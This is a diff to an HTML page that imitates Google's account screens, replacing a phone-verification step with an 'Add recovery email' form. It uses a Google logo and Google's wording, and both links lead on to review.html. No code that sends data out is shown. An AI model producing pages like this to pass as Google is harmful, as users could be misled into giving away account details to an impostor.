--- a/recovery.html
+++ b/recovery.html
@@ -3,8 +3,8 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Phone Verify</title>
-    <link rel="stylesheet" href="style.css">
+    <title>RECOVERY</title>
+    <link rel="stylesheet" href="./style.css">
 </head>
 <body>
     <main>
@@ -12,34 +12,24 @@
             <div class="firstbox">
                 <div class="img-h1">
                     <img src="images/logo google.jpg" alt="logo">
-                    <h1 class="text-h1">Confirm you're not a robot</h1>
+                    <h1 class="text-h1">Add recovery email</h1>
                 </div>
 
-                <div class="main-box1">
+                <div class="main-box">
                     <p class="text">
-                        Get a verification code send to your phone
+                        The address where Google can contact you if<br>
+                        there's unusual activity in your account or if you get<br>
+                        locked out.
                     </p>
                </div>
 
-               <div class="inputbar1">
-                    <select name="town" id="town" class="selectown">CMR  
-                        <option class="option" value="CMR" selected>CMR</option>
-                        <option class="option" value="CMR">France</option>
-                        <option class="option" value="CMR">USA</option>
-                        <option class="option" value="CMR">Deutsh</option>
-                        <option class="option" value="CMR">Spanish</option>
-                    </select>
-                    <input type="email2" name="email address" placeholder="Phone number">
-                    <nav>
-                        <p class="email2">
-                            Google will verify this number via SMS (charges may apply)
-                        </p>
-                        <div class="angletag2">
-                            <a href="verify.html" class="nextpage">Next</a>
-                        </div>
+               <div class="inputbar">
+                    <input type="email" name="email address" placeholder="Recovery email address">
+                    <nav class="button">
+                        <a href="review.html" class="next-button">Next</a>
+                        <a href="review.html" class="skip-button">Skip</a>
                     </nav>
                </div>
-
            </div>
 
            <div class="lastbox1">
